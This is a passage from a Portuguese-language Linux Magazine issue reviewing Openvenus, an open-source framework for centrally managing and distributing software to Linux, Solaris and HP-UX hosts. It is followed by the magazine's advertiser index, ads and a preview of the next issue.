como o Puppet não funcionou porque isso exigiria novo softwa-re. Essa e outras ca-racterísticas ausentes no scVenus levaram

Flügel a continuar

o desenvolvimento de uma im-plementação que havia iniciado algum tempo antes: o Openvenus [2]. O software é modelado em scVenus. Como a equipe de Flügel já havia investido grande esforço nos scripts scVenus, seu objetivo era garantir a compatibilidade com o scVenus em nível de API.

O que o sistema ofereceAdministradores que instalarem um servidor Openvenus (quadro 1), possuem uma plataforma que faci-lita o gerenciamento centralizado de sistema. O software não só con-trola as máquinas Linux (Red Hat, Fedora, CentOS, SUSE), mas tam-bém Solaris ou HP-UX; é possível até mesmo integrar os sistemas Windows, se o ambiente Cygwin estiver instalado.

Openvenus executa coman-dos simultaneamente em muitos computadores. Para permitir que isso aconteça, os administradores agrupam os dispositivos; um com-putador pode pertencer a vários grupos. Além disso, o framework distribui arquivos individuais ou pacotes de software inteiros para os sistemas gerenciados. Tecnica-mente, o Openvenus compreende um servidor mestre com os quais os clientes a ser administrados são conectados (figura 1). No servidor, instalamos dois pacotes, Basic e Server, embora os clientes só pre-cisem do pacote básico. Grandes configurações também podem ser executadas em mais de um

Análise

76 www.linuxmagazine.com.br

servidor. A autenticação entre o cliente e o servidor se baseia em certificados SSL emitidos pelo mestre no curso de cada instala-ção do cliente. Uma vez que a co-nexão foi estabelecida, o servidor pode controlar remotamente os clientes e transferir arquivos ou pacotes de software para eles.

Muitos patrõesO Openvenus é projetado para vá-rios administradores, cada um deles com uma conta própria e com atri-buições distintas de conjuntos de tarefas. Para desencadear ações, o administrador faz logon no nó mes-tre. Para cada comando, podemos configurar qual administrador (ou grupo) precisa executar o comando em qual host (ou em qual grupo). Os direitos especiais também po-dem ser construídos; por exemplo, à John é dado acesso administrativo a todos os hosts no grupo Accounts, exceto para o host Banking. As lis-tas de administradores e grupos de

host são armazenadas localmente na master ou em um serviço de di-retório, como NIS ou LDAP; este último é mais recomendado.

MarcaçãoAo executar comandos, o Open-venus possui dois modos. Os ad-ministradores podem executar comandos simples como um super-usuário no cliente usando ovprdo, enquanto ovrdo executa o comando como um usuário normal. A saída dos comandos aparece no console onde foram iniciados e está escri-ta no log; o Openvenus também avalia o código de saída de cada comando executado.

Se um host da lista é inatingível, o Openvenus registra isso como um erro, mas não coloca a tarefa em fila. Podemos colocar coman-dos em fila para hosts inatingíveis usando a opção +N; a variante não privilegiada não é projetada para operação em lote. A figura 2 mostra um comando de fluxo de trabalho.

O segundo modo, uma variante para operações mais complexas, são métodos. O Openvenus possui uma API separada para isso. Mé-todos são implementados em Perl ou scripts Bash. O administrador faz a verificação em um repositó-rio e pode então usar ovrapply para executá-los no lado do cliente. O comando ovrapply usa lotes por pa-drão, mas é possível desabilitar a opção com o parâmetro -N.

Nos clientes, o serviço ovpoll consulta o servidor para ver se as tarefas estão pendentes. Alternati-vamente, ovqpush desencadeia uma fila de execução no servidor. Para as filas, podemos usar comandos para listar os trabalhos em curso e excluir trabalhos. O servidor não tenta por conta própria reiniciar um trabalho que falhou, mas po-demos fazer isso com um push ou pull agendado via cronjob.

Distribuição de softwareAlém de realizar trabalhos com uma API própria, um segundo recurso importante do Openvenus é a dis-tribuição de software. O software suporta atualmente pacotes Solaris, pacotes Linux no formato RPM e tarballs. Antes que o usuário pos-sa distribuir o software, precisará verificá-lo no servidor Openvenus. Depois disso, o sistema lista, instala ou cancela os pacotes na requisição.

Manter os arquivos de configu-ração proporciona uma fonte cons-tante de trabalho. Se um serviço em um servidor for modificado,

Figura 1 Estrutura de uma configuração Openvenus típica.

Quadro 1: Instalação O software está disponível online [3] como um pacote de código fonte. Para projetar e operar o Openvenus, é necessário um sistema operacional com capacidade de multithread, como o Linux, além de Perl, OpenSSL e a biblioteca de utilitários Afbackup [3]; a biblioteca é do mesmo autor do Openvenus.No laboratório, os testes revelaram que não é uma boa ideia simplesmente executar ./configure && make && make install. Em vez disso, use make rpms como o terceiro passo e instale os pacotes que este passo cria. A razão é que os RPMs transportam scripts de pós-instalação que, em particular, tornam muito mais fácil provisionar o servidor que o mecanismo de make install.

Servidor Openvenus

Cliente OpenvenusCliente Openvenus Cliente Openvenus

Comandos , softwares e configurações com clientes

77Linux Magazine #108 | Fevereiro de 2014

será preciso deixar algumas cen-tenas de clientes na rede. O Open-venus gera um repositório para esses arquivos de configuração; hosts podem ser adicionados aos grupos com os mesmos arquivos de configuração, como arquivos específicos para Solaris ou Linux. Para editar os arquivos de con-figuração, será preciso verificar o arquivo, alterá-lo e verifica-lo novamente. Como o repositório inclui controle de versão, configu-ração de rollbacks são possíveis. O controle de versão também se aplica aos métodos.

O comando ovpdistfile, em se-guida, distribui o arquivo para um grupo de clientes. O Openvenus faz os lotes das tarefas se os clientes individuais na lista de grupos não estiverem disponíveis, pacotes e métodos diversos podem ser com-binados em um meta-pacote para permitir que o Openvenus distribua pacotes consistentes. A API também fornece um recurso separado que transfere os arquivos para o cliente quando o método é executado. Este recurso é especialmente útil quan-do um serviço não possui apenas um, mas vários arquivos de confi-guração que sempre precisam ser alterados juntos. Todas as ações são registradas pelo Openvenus, de forma que os administradores possam controlar quem fez o quê e quando.

API para métodosOs métodos usam a API para acessar o framework. Scripts Bash são o padrão para o Open-venus, mas outras linguagens também são permitidas, desde que suportem o mecanismo #!. Mais especificamente, o Open-venus aceita scripts no formato:

#! <Interpreter>: <Program>

Este método funciona até mes-mo em sistemas Windows que não entendem #! nativamente.

Scripts que são executados no framework podem referen-ciar um conjunto de variáveis de ambiente que são internas do Openvenus. Além disso, os administradores podem passar suas próprias variáveis de am-biente através de uma declara-ção de configuração. A descrição da API identifica uma série de funções de utilitários, tais como os de instalação de pacotes ou acesso a informações do Open-venus. Falando em descrições: a documentação Openvenus é aceitável como uma referência, mas não necessariamente facilita a introdução ao programa.

ConclusãoEm grandes redes com vários sistemas operacionais em uso, o scVenus e seu descendente em

código aberto Openvenus real-mente mostram a que vieram. Uma vantagem do Openvenus é o su-porte para sistemas operacionais bastante antigos, que remontam ao SunOS 4, substituído pela Sun em meados da década de 1990.

A master principal executa co-mandos e scripts e distribui arqui-vos de software e configuração. Os administradores podem agrupar clientes; o Openvenus também identifica automaticamente a arquitetura e o sistema operacio-nal. Como muitas características são baseadas em scripts, elas são fáceis de entender e projetadas para permitir que o administra-dor as personalize e desenvolva. O Openvenus também vem com dependências mínimas. Por exem-plo, uma instalação Ruby, exigida pelo Puppet, não é necessária.

Outros frameworks impres-sionam com mais recursos e uma grande comunidade que oferece receitas pré-compiladas para tare-fas padrão. A função do Openve-nus, por outro lado, é algo que os administradores podem entender. Usuários antigos do scVenus que ainda possuem scripts personaliza-dos e querem continuar a usá-los podem contar com os benefícios oferecidos pelo Openvenus. n

Mais informações[1] scVenus: http://www.scien‑ce‑computing.de/en/software/system‑management.html [2] Openvenus: http://source‑forge.net/projects/openvenus/ [3] Afbackup: http://sourcefor‑ge.net/projects/afbackup/

Gostou do artigo?Queremos ouvir sua opinião. Fale conosco em: cartas@linuxmagazine.com.brEste artigo no nosso site: http://lnm.com.br/article/9103

Figura 2 Aqui, o Openvenus controla a execução de um comando no venusclient.

80 www.linuxmagazine.com.br

Índice de anunciEmpresa Pág.

Supermicro 02

Altabooks 11

Alfresco 14

Unodata 20

Plus Server 22, 23

Sesc 27

Uol Cloud 29

Kontroller 43

Apiki 47

SpagoBi 55

netRevenda 58

Central Server 81

WatchGuard 83

Solução completa hospedada em nuvem (Cloud Computing)

Saiba mais em:www.vectory.com.br

+55 11 3104 6652

SOFTWARE

A solução de gestão integrada ADempiere é um poderoso sistema ERP, CRM e SCM de Código Aberto, que conta com um conjunto completo de recursos, organizados através de processos de negócios. Essa organização resulta em uma plataforma única, totalmente integrada e consistente, propor-cionando aos usuários uma visão integral de sua empresa e permitindo uma análise em 360 graus de todo o relacionamento com clientes, fornecedores e colaboradores.

Agora você tem o controle sobre o desempenho do seu negócio

sempre à sua mão.

ServiçosCalendário de eventos

Evento Data Local

InterCon WordPress 31 de maio InterContinental Hotel – Alameda Santos, 1.123

InterCon PHP 19 de julho InterContinental Hotel – Alameda Santos, 1.123

InterCon Android 13 de setembro InterContinental Hotel – Alameda Santos, 1.123

82 www.linuxmagazine.com.br

Bancos de DadosNa próxima edição da Linux Magazine, vamos apresentar os mais recentes recursos da mais nova versão do PostgreSQL.

Conheça ainda ferramentas para replicação de dados, tunning e sincronização de informações em bancos de dados instalados em diferentes servidores.

Segurança de dados, programação e muito mais, na próxima edição.

Não perca! n

Virtualização de Desktop Quais são as reais vantagens de pos-suir um desktop virtualizado? Quais são os reais benefícios de manter a infraestrutura de usuário virtualizada a este nível? Estas e outras perguntas serão repondidas na próxima edição da Admin Magazine, onde você irá aprender como funciona e como man-ter uma insfraestrutura de desktops virtualizados utilizando as mais mo-dernas ferramentas de virtualização disponíveis no mercado. n

Linux Magazine #109

Admin Magazine #11

Preview

Você é refém da Operadora de Telecom?Altos custos de conectividade impedem sua empresa de ter links redundantes.

Alugue um Firewall gerenciado a partir de R$ 300,00/mês.

Não pule no vazio! Achar que a segurança é simples é o começo de seus problemas!

É um erro, total e comum, achar que qualquer um na sua TI pode fazer gestão de segurança da sua rede!

Otimização de Links, Controle de Navegação, Controle de Aplicações,

Controle de Conteúdo e Antivírus, Soluções Antispam, implementadas localmente ou na nuvem, Proteção de Invasões e Ataques,

Balanceamento de Links e Servidores,Análise de Vulnerabilidades e Riscos,

Conectividade entre Sites, Fornecedores, etc.Conectividade Segura para Usuários Móveis,

vendas@altermedios.com.br (11) 3393.3340